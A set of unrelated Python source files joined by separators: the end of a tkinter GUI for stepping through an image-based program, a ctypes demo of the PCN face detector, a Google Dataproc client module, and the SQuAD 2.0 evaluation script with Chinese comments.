self.scaleSize = 15
# In percentage
self.executionSpeed = 15
# In seconds
self.maxWait = 5
self.image = None
self.graph = None
self.programState = None
self.selectedPosition = None
self.optionBar = None
self.actionBar = None
self.content = None
self.canvas = None
#1: Create a builder
self.builder = pygubu.Builder()
#2: Load an ui file
self.builder.add_from_file("{}/tkinterLayout.ui".format(os.path.abspath(os.path.dirname(__file__))))
#3: Create the mainwindow
self.mainwindow = self.builder.get_object('rootWindow')
self.initializeFrames()
self.initializeCallbacks()
self.infoManager = infoManager.infoManager(self.builder, self.generalInfoFrame, self.programStateInfoFrame)
self.canvasManager = canvasManager.canvasManager(self.canvas, self.image, self.programState, self.scaleSize)
def run(self):
self.mainwindow.mainloop()
def initializeCallbacks(self):
self.builder.connect_callbacks({
'loadFile': self.loadFile,
'setScale': self.setScale,
'takeStep': self.takeStep
})
horizontalBar = self.builder.get_object("canvasHorizontalScroll", self.canvasFrame)
verticalBar = self.builder.get_object("canvasVerticalScroll", self.canvasFrame)
horizontalBar.config(command = self.canvas.xview)
verticalBar.config(command = self.canvas.yview)
self.canvas.config(xscrollcommand=horizontalBar.set, yscrollcommand=verticalBar.set)
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def initializeFrames(self):
self.optionBar = self.builder.get_object('optionBar', self.mainwindow)
self.content = self.builder.get_object('content', self.mainwindow)
self.actionBar = self.builder.get_object('actionBar', self.mainwindow)
self.generalInfoFrame = self.builder.get_object("generalInfoFrame", self.content)
self.programStateInfoFrame = self.builder.get_object("programStateInfoFrame", self.content)
self.canvasFrame = self.builder.get_object('canvasFrame', self.content)
self.canvas = self.builder.get_object('canvas', self.canvasFrame)
def update(self):
self.infoManager.updateInfo(self.image, self.graph, self.programState)
self.canvasManager.updateScaleSize(self.scaleSize)
self.canvasManager.updateImage(self.image)
self.canvasManager.updateProgramState(self.programState)
self.canvasManager.updateCanvas()
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def takeStep(self):
if self.image is None or self.programState is None or self.graph is None:
return None
newProgramState = main.takeStep(self.image, self.programState)
# Error encountered, close window
if isinstance(newProgramState, BaseException):
self.mainwindow.destroy()
self.mainwindow.quit()
raise newProgramState
self.programState = newProgramState
self.selectedPosition = self.programState.position
self.update()
return True
def setFileText(self, filePath):
self.builder.get_object("fileNameEntry", self.optionBar).delete(0, len(self.builder.get_object("fileNameEntry", self.optionBar).get()))
self.builder.get_object("fileNameEntry", self.optionBar).insert(0, filePath)
def setExecutionSpeed(self, pos):
if 0 < float(pos) < 100:
self.executionSpeed = float(pos)
def setScale(self):
scaleValue = int(self.builder.get_object('scaleEntry', self.optionBar).get())
if 0 < scaleValue < 100:
self.canvasManager.clearCanvas()
self.scaleSize = int(scaleValue)
self.update()
self.canvasManager.drawImage()
self.canvasManager.updateCanvas()
def loadFile(self):
fileName = self.builder.get_object('fileNameEntry', self.optionBar).get()
if len(fileName) < 1:
return None
try:
tmpImage = imageWrapper.getImage(fileName)
except FileNotFoundError:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The file '{}' could not be found".format(fileName))
return False
tmpResult = lexer.graphImage(tmpImage)
if len(tmpResult[1]) != 0:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The following exceptions occured while making the graph:\n{}".format("".join(list(map(lambda x: "\t{}\n".format(x), tmpResult[1])))))
return False
self.image = tmpImage
self.graph = tmpResult[0]
self.programState = programState(self.graph, position((0,0)), direction((0,0)))
# Reset previous state
self.canvasManager.previousProgramState = None
self.canvasManager.programState = None
self.update()
|
#!/usr/bin/python3
from ctypes import *
import cv2
import numpy as np
import sys
import os
import time
from ipdb import set_trace as dbg
from enum import IntEnum
class CPoint(Structure):
_fields_ = [("x", c_int),
("y", c_int)]
FEAT_POINTS = 14
class CWindow(Structure):
_fields_ = [("x", c_int),
("y", c_int),
("width", c_int),
("angle", c_int),
("score", c_float),
("points",CPoint*FEAT_POINTS)]
class FeatEnam(IntEnum):
CHIN_0 = 0
CHIN_1 = 1
CHIN_2 = 2
CHIN_3 = 3
CHIN_4 = 4
CHIN_5 = 5
CHIN_6 = 6
CHIN_7 = 7
CHIN_8 = 8
NOSE = 9
EYE_LEFT = 10
EYE_RIGHT = 11
MOUTH_LEFT = 12
MOUTH_RIGHT = 13
FEAT_POINTS = 14
lib = CDLL("/usr/local/lib/libPCN.so")
init_detector = lib.init_detector
#void *init_detector(const char *detection_model_path,
# const char *pcn1_proto, const char *pcn2_proto, const char *pcn3_proto,
# const char *tracking_model_path, const char *tracking_proto,
# int min_face_size, float pyramid_scale_factor, float detection_thresh_stage1,
# float detection_thresh_stage2, float detection_thresh_stage3, int tracking_period,
# float tracking_thresh, int do_smooth)
init_detector.argtypes = [
c_char_p, c_char_p, c_char_p,
c_char_p, c_char_p, c_char_p,
c_int,c_float,c_float,c_float,
c_float,c_int,c_float,c_int]
init_detector.restype = c_void_p
#CWindow* detect_faces(void* pcn, unsigned char* raw_img,size_t rows, size_t cols, int *lwin)
detect_faces = lib.detect_faces
detect_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_faces.restype = POINTER(CWindow)
#CWindow* detect_track_faces(void* pcn, unsigned char* raw_img,size_t rows, size_t cols, int *lwin)
detect_track_faces = lib.detect_track_faces
detect_track_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_track_faces.restype = POINTER(CWindow)
#void free_faces(CWindow* wins)
free_faces = lib.free_faces
free_faces.argtypes= [c_void_p]
# void free_detector(void *pcn)
free_detector = lib.free_detector
free_detector.argtypes= [c_void_p]
CYAN=(255,255,0)
BLUE=(255,0,0)
RED=(0,0,255)
GREEN=(0,255,0)
YELLOW=(0,255,255)
def DrawFace(win,img):
width = 2
x1 = win.x
y1 = win.y
x2 = win.width + win.x - 1
y2 = win.width + win.y - 1
centerX = (x1 + x2) / 2
centerY = (y1 + y2) / 2
angle = win.angle
R = cv2.getRotationMatrix2D((centerX,centerY),angle,1)
pts = np.array([[x1,y1,1],[x1,y2,1],[x2,y2,1],[x2,y1,1]], np.int32)
pts = (pts @ R.T).astype(int) #Rotate points
pts = pts.reshape((-1,1,2))
cv2.polylines(img,[pts],True,CYAN,width)
cv2.line(img, (pts[0][0][0],pts[0][0][1]), (pts[3][0][0],pts[3][0][1]), BLUE, width)
def DrawPoints(win,img):
width = 2
f = FeatEnam.NOSE
cv2.circle(img,(win.points[f].x,win.points[f].y),width,GREEN,-1)
f = FeatEnam.EYE_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.EYE_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.MOUTH_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
f = FeatEnam.MOUTH_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
for i in range(8):
cv2.circle(img,(win.points[i].x,win.points[i].y),width,BLUE,-1)
def SetThreadCount(threads):
os.environ['OMP_NUM_THREADS'] = str(threads)
def c_str(str_in):
return c_char_p(str_in.encode('utf-8'))
video_flag = 0
if __name__=="__main__":
SetThreadCount(1)
path = '/usr/local/share/pcn/'
detection_model_path = c_str(path + "PCN.caffemodel")
pcn1_proto = c_str(path + "PCN-1.prototxt")
pcn2_proto = c_str(path + "PCN-2.prototxt")
pcn3_proto = c_str(path + "PCN-3.prototxt")
tracking_model_path = c_str(path + "PCN-Tracking.caffemodel")
tracking_proto = c_str(path + "PCN-Tracking.prototxt")
if video_flag:
cap = cv2.VideoCapture(0)
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,1)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
fps = cap.get(cv2.CAP_PROP_FPS)
while cap.isOpened():
ret, frame = cap.read()
if ret == False:
break
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_track_faces(detector, raw_data,
int(height), int(width),
pointer(face_count))
end = time.time()
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
fps = int(1 / (end - start))
cv2.putText(frame, str(fps) + "fps", (20, 45), 4, 1, (0, 0, 125))
cv2.imshow('PCN', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,0)
for i in range(1, 27):
frame = cv2.imread("imgs/" + str(i) + ".jpg")
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_faces(detector, raw_data,
frame.shape[0], frame.shape[1],
pointer(face_count))
end = time.time()
print(i, end - start, "s")
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
cv2.imshow('PCN', frame)
cv2.waitKey()
free_detector(detector)
|
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from google.cloud.dataproc_v1 import ClusterControllerClient
from google.cloud.dataproc_v1 import JobControllerClient
from google.cloud.dataproc_v1 import WorkflowTemplateServiceClient
from google.cloud.dataproc_v1 import enums
from google.cloud.dataproc_v1 import types
__all__ = (
"enums",
"types",
"ClusterControllerClient",
"JobControllerClient",
"WorkflowTemplateServiceClient",
)
|
#*#*#*./examples/evaluate.py
"""Official evaluation script for SQuAD version 2.0.
In addition to basic functionality, we also compute additional statistics and
plot precision-recall curves if an additional na_prob.json file is provided.
This file is expected to map question ID's to the model's predicted probability
that a question is unanswerable.
"""
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
OPTS = None
def parse_args():
parser = argparse.ArgumentParser('Official evaluation script for SQuAD version 2.0.')
parser.add_argument('data_file', metavar='data.json', help='Input data JSON file.')
parser.add_argument('pred_file', metavar='pred.json', help='Model predictions.')
parser.add_argument('--out-file', '-o', metavar='eval.json',
help='Write accuracy metrics to file (default is stdout).')
parser.add_argument('--na-prob-file', '-n', metavar='na_prob.json',
help='Model estimates of probability of no answer.')
parser.add_argument('--na-prob-thresh', '-t', type=float, default=1.0,
help='Predict "" if no-answer probability exceeds this (default = 1.0).')
parser.add_argument('--out-image-dir', '-p', metavar='out_images', default=None,
help='Save precision-recall curves to directory.')
parser.add_argument('--verbose', '-v', action='store_true')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def make_qid_to_has_ans(dataset):
qid_to_has_ans = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid_to_has_ans[qa['id']] = bool(qa['answers'])
return qid_to_has_ans
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
regex = re.compile(r'\b(a|an|the)\b', re.UNICODE)
return re.sub(regex, ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def get_tokens(s):
if not s: return []
return normalize_answer(s).split()
def compute_exact(a_gold, a_pred):
return int(normalize_answer(a_gold) == normalize_answer(a_pred))
def compute_f1(a_gold, a_pred):
gold_toks = get_tokens(a_gold) #答案list
pred_toks = get_tokens(a_pred)
common = collections.Counter(gold_toks) & collections.Counter(pred_toks)###c.Counter([1,2,33])& c.Counter([2,3,4]) res: Counter({2: 1})
num_same = sum(common.values()) ###所有出现的相同词的总个数
if len(gold_toks) == 0 or len(pred_toks) == 0: ##无答案问题直接对比
# If either is no-answer, then F1 is 1 if they agree, 0 otherwise
return int(gold_toks == pred_toks)
if num_same == 0:
return 0
precision = 1.0 * num_same / len(pred_toks) #准确率
recall = 1.0 * num_same / len(gold_toks) #召回率
f1 = (2 * precision * recall) / (precision + recall) #f1
return f1
def get_raw_scores(dataset, preds):
exact_scores = {}
f1_scores = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid = qa['id']
gold_answers = [a['text'] for a in qa['answers']
if normalize_answer(a['text'])]
if not gold_answers:
# For unanswerable questions, only correct answer is empty string
gold_answers = ['']
if qid not in preds:
print('Missing prediction for %s' % qid)
continue
a_pred = preds[qid]
# Take max over all gold answers
exact_scores[qid] = max(compute_exact(a, a_pred) for a in gold_answers)
f1_scores[qid] = max(compute_f1(a, a_pred) for a in gold_answers)
return exact_scores, f1_scores
def apply_no_ans_threshold(scores, na_probs, qid_to_has_ans, na_prob_thresh):
new_scores = {}
for qid, s in scores.items():
pred_na = na_probs[qid] > na_prob_thresh ##有答案变成了无答案的情况
if pred_na:
new_scores[qid] = float(not qid_to_has_ans[qid])
else:
new_scores[qid] = s
return new_scores
def make_eval_dict(exact_scores, f1_scores, qid_list=None):
if not qid_list:
total = len(exact_scores)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores.values()) / total),
('f1', 100.0 * sum(f1_scores.values()) / total),
('total', total),
])
else:
total = len(qid_list)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores[k] for k in qid_list) / total),
('f1', 100.0 * sum(f1_scores[k] for k in qid_list) / total),
('total', total),
])
def merge_eval(main_eval, new_eval, prefix):
for k in new_eval:
main_eval['%s_%s' % (prefix, k)] = new_eval[k]
def plot_pr_curve(precisions, recalls, out_image, title):
plt.step(recalls, precisions, color='b', alpha=0.2, where='post')
plt.fill_between(recalls, precisions, step='post', alpha=0.2, color='b')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.xlim([0.0, 1.05])
plt.ylim([0.0, 1.05])
plt.title(title)
plt.savefig(out_image)
plt.clf()
def make_precision_recall_eval(scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=None, title=None):
qid_list = sorted(na_probs, key=lambda k: na_probs[k])
true_pos = 0.0
cur_p = 1.0
cur_r = 0.0
precisions = [1.0]
recalls = [0.0]
avg_prec = 0.0
for i, qid in enumerate(qid_list):
if qid_to_has_ans[qid]:
true_pos += scores[qid]
cur_p = true_pos / float(i+1)
cur_r = true_pos / float(num_true_pos)
if i == len(qid_list) - 1 or na_probs[qid] != na_probs[qid_list[i+1]]:
# i.e., if we can put a threshold after this point
avg_prec += cur_p * (cur_r - recalls[-1])
precisions.append(cur_p)
recalls.append(cur_r)
if out_image:
plot_pr_curve(precisions, recalls, out_image, title)
return {'ap': 100.0 * avg_prec}
def run_precision_recall_analysis(main_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir):
if out_image_dir and not os.path.exists(out_image_dir):
os.makedirs(out_image_dir)
num_true_pos = sum(1 for v in qid_to_has_ans.values() if v)
if num_true_pos == 0:
return
pr_exact = make_precision_recall_eval(
exact_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_exact.png'),
title='Precision-Recall curve for Exact Match score')
pr_f1 = make_precision_recall_eval(
f1_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_f1.png'),
title='Precision-Recall curve for F1 score')
oracle_scores = {k: float(v) for k, v in qid_to_has_ans.items()}
pr_oracle = make_precision_recall_eval(
oracle_scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_oracle.png'),
title='Oracle Precision-Recall curve (binary task of HasAns vs. NoAns)')
merge_eval(main_eval, pr_exact, 'pr_exact')
merge_eval(main_eval, pr_f1, 'pr_f1')
merge_eval(main_eval, pr_oracle, 'pr_oracle')
def histogram_na_prob(na_probs, qid_list, image_dir, name):
if not qid_list:
return
x = [na_probs[k] for k in qid_list]
weights = np.ones_like(x) / float(len(x))
plt.hist(x, weights=weights, bins=20, range=(0.0, 1.0))
plt.xlabel('Model probability of no-answer')
plt.ylabel('Proportion of dataset')
plt.title('Histogram of no-answer probability: %s' % name)
plt.savefig(os.path.join(image_dir, 'na_prob_hist_%s.png' % name))
plt.clf()
def find_best_thresh(preds, scores, na_probs, qid_to_has_ans):
num_no_ans = sum(1 for k in qid_to_has_ans if not qid_to_has_ans[k])
cur_score = num_no_ans
best_score = cur_score
best_thresh = 0.0
qid_list = sorted(na_probs, key=lambda k: na_probs[k]) #从小到大按照diff排序
for i, qid in enumerate(qid_list):
if qid not in scores: continue
if qid_to_has_ans[qid]:
diff = scores[qid]
else:
if preds[qid]:
diff = -1
else:
diff = 0
cur_score += diff
if cur_score > best_score:
best_score = cur_score
best_thresh = na_probs[qid]
return 100.0 * best_score / len(scores), best_thresh
def find_all_best_thresh(main_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans):
best_exact, exact_thresh = find_best_thresh(preds, exact_raw, na_probs, qid_to_has_ans)
best_f1, f1_thresh = find_best_thresh(preds, f1_raw, na_probs, qid_to_has_ans)
main_eval['best_exact'] = best_exact
main_eval['best_exact_thresh'] = exact_thresh
main_eval['best_f1'] = best_f1
main_eval['best_f1_thresh'] = f1_thresh
def main():
with open(OPTS.data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(OPTS.pred_file) as f:
preds = json.load(f)
if OPTS.na_prob_file:
with open(OPTS.na_prob_file) as f:
na_probs = json.load(f)
else:
na_probs = {k: 0.0 for k in preds}
qid_to_has_ans = make_qid_to_has_ans(dataset) # maps qid to True/False
has_ans_qids = [k for k, v in qid_to_has_ans.items() if v]
no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v]
exact_raw, f1_raw = get_raw_scores(dataset, preds) #得到每个答案的extract和f1 list
exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
if OPTS.na_prob_file:
find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans)
if OPTS.na_prob_file and OPTS.out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, OPTS.out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, OPTS.out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, OPTS.out_image_dir, 'noAns')
if OPTS.out_file:
with open(OPTS.out_file, 'w') as f:
json.dump(out_eval, f)
else:
print(json.dumps(out_eval, indent=2))
def judgeOnline(data_file,pred_file,na_prob_file,output_dir,epoch,train_steps):
if not os.path.exists(os.path.join(output_dir,"eval_res")):
os.makedirs(os.path.join(output_dir,"eval_res"))
output = os.path.join(output_dir,"eval_res")
out_file = os.path.join(output,"eval.json")
out_image_dir = None
na_prob_thresh = 1.0
with open(data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(pred_file) as f:
preds = json.load(f)
with open(na_prob_file) as f:
na_probs = json.load(f)
exact_raw, f1_raw = get_raw_scores(dataset, preds)
qid_to_has_ans = make_qid_to_has_ans(dataset) # maps qid to True/False 区分dev中的有无答案
has_ans_qids = [k for k, v in qid_to_has_ans.items() if v] #有答案的问题
no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v] #无答案的问题
exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
na_prob_thresh)###这里没用因为默认的是1.0 详情可参考该函数
f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
na_prob_thresh)###这里没用因为默认的是1.0 详情可参考该函数
out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
if na_prob_file: ##如果给出null_odds.json文件
find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans) ##获取最好的thresh
if na_prob_file and out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, out_image_dir, 'noAns')
if out_file:
with open(out_file, 'a') as fout:
fout.write("epoch:{} steps:{} evaluation res:{}\n".format(epoch,train_steps,json.dumps(out_eval, sort_keys=True, indent=2)))
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO )
logger.info("write evaluation result to " + out_file + "OK!")
else:
print(json.dumps(out_eval, indent=2))
return out_eval
if __name__ == '__main__':
OPTS = parse_args()
if OPTS.out_image_dir:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
print(vars(OPTS))
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.